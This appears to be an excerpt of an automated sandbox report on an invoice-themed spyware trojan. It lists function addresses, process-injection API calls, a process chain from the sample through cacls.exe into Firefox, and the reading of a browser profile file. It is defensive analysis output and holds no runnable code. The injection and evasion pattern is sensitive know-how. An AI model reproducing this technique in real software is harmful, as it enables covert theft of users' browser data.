                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02B73B18 NtResumeThread,6_2_02B73B18
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02B6F8AC NtUnmapViewOfSection,6_2_02B6F8AC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02B748F1 NtUnmapViewOfSection,6_2_02B748F1
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02B6F813 NtMapViewOfSection,6_2_02B6F813
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02B6F928 NtSetContextThread,6_2_02B6F928
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02B73E38 NtQueueApcThread,6_2_02B73E38
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02B6EF68 NtQueryInformationProcess,6_2_02B6EF68
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 1_2_02E4C2081_2_02E4C208
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 1_2_02E4C6401_2_02E4C640
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 1_2_02E4E8401_2_02E4E840
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 1_2_02E4DE401_2_02E4DE40
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 1_2_02E4BDD01_2_02E4BDD0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_00418CB34_2_00418CB3
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0040E81C4_2_0040E81C
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_004033304_2_00403330
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_004013E04_2_004013E0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0042F4734_2_0042F473
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_004024FF4_2_004024FF
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_004104834_2_00410483
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_004025004_2_00402500
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0040E6834_2_0040E683
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_004106A34_2_004106A3
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_00416EB34_2_00416EB3
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_004027044_2_00402704
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0040270F4_2_0040270F
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_004027104_2_00402710
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0040E7CA4_2_0040E7CA
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0040E7D34_2_0040E7D3
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019B010E4_2_019B010E
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E00A04_2_018E00A0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0199E0764_2_0199E076
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018FE3104_2_018FE310
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018B22454_2_018B2245
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019BA5264_2_019BA526
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F04454_2_018F0445
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019A67574_2_019A6757
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F27604_2_018F2760
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018FA7604_2_018FA760
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F06804_2_018F0680
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019AA6C04_2_019AA6C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EC6E04_2_018EC6E0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190C6004_2_0190C600
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019146704_2_01914670
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EE9A04_2_018EE9A0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019AE9A64_2_019AE9A6
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019068824_2_01906882
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F28C04_2_018F28C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191E8104_2_0191E810
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019908354_2_01990835
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018D68684_2_018D6868
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01964BC04_2_01964BC0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0B104_2_018F0B10
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019ACA134_2_019ACA13
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019AEA5B4_2_019AEA5B
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01902DB04_2_01902DB0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EAD004_2_018EAD00
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F0D694_2_018F0D69
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01908CDF4_2_01908CDF
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019BACEB4_2_019BACEB
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E0C124_2_018E0C12
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018FAC204_2_018FAC20
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0196EC204_2_0196EC20
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0199EC4C4_2_0199EC4C
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019A6C694_2_019A6C69
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019AEC604_2_019AEC60
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019AEFBF4_2_019AEFBF
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F6FE04_2_018F6FE0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018FCF004_2_018FCF00
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019A0EAD4_2_019A0EAD
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E2EE84_2_018E2EE8
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01910E504_2_01910E50
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01932E484_2_01932E48
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01990E6D4_2_01990E6D
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F51C04_2_018F51C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190B1E04_2_0190B1E0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018DF1134_2_018DF113
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0198D1304_2_0198D130
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0193717A4_2_0193717A
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0192508C4_2_0192508C
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018FB0D04_2_018FB0D0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019A70F14_2_019A70F1
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E13804_2_018E1380
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019AF3304_2_019AF330
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018DD2EC4_2_018DD2EC
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019A124C4_2_019A124C
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019AF5C94_2_019AF5C9
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019A75C64_2_019A75C6
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019854904_2_01985490
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0195D4804_2_0195D480
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019AF6F64_2_019AF6F6
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019636EC4_2_019636EC
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0198D62C4_2_0198D62C
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0199D6464_2_0199D646
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019359C04_2_019359C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018B99E84_2_018B99E8
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019698B24_2_019698B2
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019A18DA4_2_019A18DA
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019A78F34_2_019A78F3
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F38004_2_018F3800
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190B8704_2_0190B870
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019658704_2_01965870
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019AF8724_2_019AF872
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F98704_2_018F9870
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01981B804_2_01981B80
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0192DB194_2_0192DB19
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019AFB2E4_2_019AFB2E
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019AFA894_2_019AFA89
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190FAA04_2_0190FAA0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0198FDF44_2_0198FDF4
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019AFD274_2_019AFD27
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019A7D4C4_2_019A7D4C
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01989C984_2_01989C98
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190FCE04_2_0190FCE0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01977CE84_2_01977CE8
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F3C604_2_018F3C60
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019A1FC64_2_019A1FC6
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0196FF404_2_0196FF40
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019AFF634_2_019AFF63
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F1EB24_2_018F1EB2
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019A9ED24_2_019A9ED2
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_007CA4555_2_007CA455
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_007C28085_2_007C2808
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_007CA2C45_2_007CA2C4
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_007C1AC35_2_007C1AC3
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_007C32885_2_007C3288
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_007C37435_2_007C3743
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_007C33AB5_2_007C33AB
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_046DE8415_2_046DE841
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_046DE4A95_2_046DE4A9
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_046E55535_2_046E5553
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_046DD9065_2_046DD906
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_046DCBC15_2_046DCBC1
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_046E53C25_2_046E53C2
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_046DE3865_2_046DE386
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DFE3106_2_02DFE310
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DE00A06_2_02DE00A0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E9E0766_2_02E9E076
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EB010E6_2_02EB010E
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EAA6C06_2_02EAA6C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DEC6E06_2_02DEC6E0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DF06806_2_02DF0680
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E146706_2_02E14670
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E0C6006_2_02E0C600
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EA67576_2_02EA6757
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DFA7606_2_02DFA760
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DF27606_2_02DF2760
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DF04456_2_02DF0445
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EBA5266_2_02EBA526
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EAEA5B6_2_02EAEA5B
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EACA136_2_02EACA13
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E64BC06_2_02E64BC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DF0B106_2_02DF0B10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DF28C06_2_02DF28C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E068826_2_02E06882
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E8C89F6_2_02E8C89F
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DD68686_2_02DD6868
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E908356_2_02E90835
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E1E8106_2_02E1E810
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EAE9A66_2_02EAE9A6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DEE9A06_2_02DEE9A0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DE2EE86_2_02DE2EE8
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EA0EAD6_2_02EA0EAD
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E90E6D6_2_02E90E6D
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E32E486_2_02E32E48
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E10E506_2_02E10E50
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DF6FE06_2_02DF6FE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EAEFBF6_2_02EAEFBF
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DFCF006_2_02DFCF00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EBACEB6_2_02EBACEB
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E08CDF6_2_02E08CDF
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EA6C696_2_02EA6C69
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EAEC606_2_02EAEC60
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E9EC4C6_2_02E9EC4C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E6EC206_2_02E6EC20
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DE0C126_2_02DE0C12
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DFAC206_2_02DFAC20
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E02DB06_2_02E02DB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DF0D696_2_02DF0D69
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DEAD006_2_02DEAD00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DDD2EC6_2_02DDD2EC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EA124C6_2_02EA124C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DE13806_2_02DE1380
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EAF3306_2_02EAF330
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DFB0D06_2_02DFB0D0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EA70F16_2_02EA70F1
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E2508C6_2_02E2508C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E0B1E06_2_02E0B1E0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DF51C06_2_02DF51C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E3717A6_2_02E3717A
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DDF1136_2_02DDF113
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E8D1306_2_02E8D130
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E636EC6_2_02E636EC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EAF6F66_2_02EAF6F6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E9D6466_2_02E9D646
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E8D62C6_2_02E8D62C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E916236_2_02E91623
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E5D4806_2_02E5D480
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E854906_2_02E85490
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EAF5C96_2_02EAF5C9
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EA75C66_2_02EA75C6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E0FAA06_2_02E0FAA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EAFA896_2_02EAFA89
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E81B806_2_02E81B80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EAFB2E6_2_02EAFB2E
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E2DB196_2_02E2DB19
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EA78F36_2_02EA78F3
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EA18DA6_2_02EA18DA
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E698B26_2_02E698B2
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E0B8706_2_02E0B870
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E658706_2_02E65870
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EAF8726_2_02EAF872
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DF98706_2_02DF9870
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DF38006_2_02DF3800
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E359C06_2_02E359C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EA9ED26_2_02EA9ED2
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DF1EB26_2_02DF1EB2
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EA1FC66_2_02EA1FC6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EAFF636_2_02EAFF63
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E6FF406_2_02E6FF40
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E0FCE06_2_02E0FCE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E77CE86_2_02E77CE8
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E89C986_2_02E89C98
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02DF3C606_2_02DF3C60
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E8FDF46_2_02E8FDF4
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EA7D4C6_2_02EA7D4C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02EAFD276_2_02EAFD27
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02B6EF5A6_2_02B6EF5A
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02B6E2886_2_02B6E288
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02B752C46_2_02B752C4
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02B6E3AB6_2_02B6E3AB
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02B6E7436_2_02B6E743
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02B754556_2_02B75455
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02B6CAC36_2_02B6CAC3
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02B6D8086_2_02B6D808
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_0000014045E39AC37_2_0000014045E39AC3
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_0000014045E422C47_2_0000014045E422C4
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_0000014045E3B2887_2_0000014045E3B288
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_0000014045E424557_2_0000014045E42455
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_0000014045E3A8087_2_0000014045E3A808
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_0000014045E3B3AB7_2_0000014045E3B3AB
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_0000014045E3B7437_2_0000014045E3B743
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: String function: 01925050 appears 56 times
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: String function: 018DB910 appears 275 times
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: String function: 0195E692 appears 86 times
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: String function: 01937BE4 appears 100 times
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: String function: 0196EF10 appears 104 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 02E5E692 appears 86 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 02DDB910 appears 275 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 02E6EF10 appears 104 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 02E37BE4 appears 101 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 02E25050 appears 58 times
                Source: attached invoice.exe, 00000001.00000002.811362026911.0000000004019000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs attached invoice.exe
                Source: attached invoice.exe, 00000001.00000002.811358283117.00000000011DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs attached invoice.exe
                Source: attached invoice.exe, 00000001.00000002.811360864614.0000000003050000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs attached invoice.exe
                Source: attached invoice.exe, 00000001.00000002.811364792621.0000000006EA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs attached invoice.exe
                Source: attached invoice.exe, 00000001.00000002.811364217625.0000000005A20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs attached invoice.exe
                Source: attached invoice.exe, 00000004.00000002.811738027901.000000000146E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCACLS.EXEj% vs attached invoice.exe
                Source: attached invoice.exe, 00000004.00000002.811738027901.0000000001457000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCACLS.EXEj% vs attached invoice.exe
                Source: attached invoice.exe, 00000004.00000002.811738580273.00000000019DD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs attached invoice.exe
                Source: attached invoice.exeBinary or memory string: OriginalFilenamegOlQ.exe0 vs attached invoice.exe
                Source: attached invoice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: attached invoice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, tclsShwOHDsKpqQ49L.csSecurity API names: _0020.SetAccessControl
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, tclsShwOHDsKpqQ49L.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, tclsShwOHDsKpqQ49L.csSecurity API names: _0020.AddAccessRule
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, pT4HsND8fvse4LLpI4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, tclsShwOHDsKpqQ49L.csSecurity API names: _0020.SetAccessControl
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, tclsShwOHDsKpqQ49L.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, tclsShwOHDsKpqQ49L.csSecurity API names: _0020.AddAccessRule
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, pT4HsND8fvse4LLpI4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@16/14
                Source: C:\Users\user\Desktop\attached invoice.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\attached invoice.exe.logJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\cacls.exeFile created: C:\Users\user\AppData\Local\Temp\t577G2K6Jump to behavior
                Source: attached invoice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: attached invoice.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: attached invoice.exeReversingLabs: Detection: 39%
                Source: unknownProcess created: C:\Users\user\Desktop\attached invoice.exe "C:\Users\user\Desktop\attached invoice.exe"
                Source: C:\Users\user\Desktop\attached invoice.exeProcess created: C:\Users\user\Desktop\attached invoice.exe "C:\Users\user\Desktop\attached invoice.exe"
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
                Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\attached invoice.exeProcess created: C:\Users\user\Desktop\attached invoice.exe "C:\Users\user\Desktop\attached invoice.exe"Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
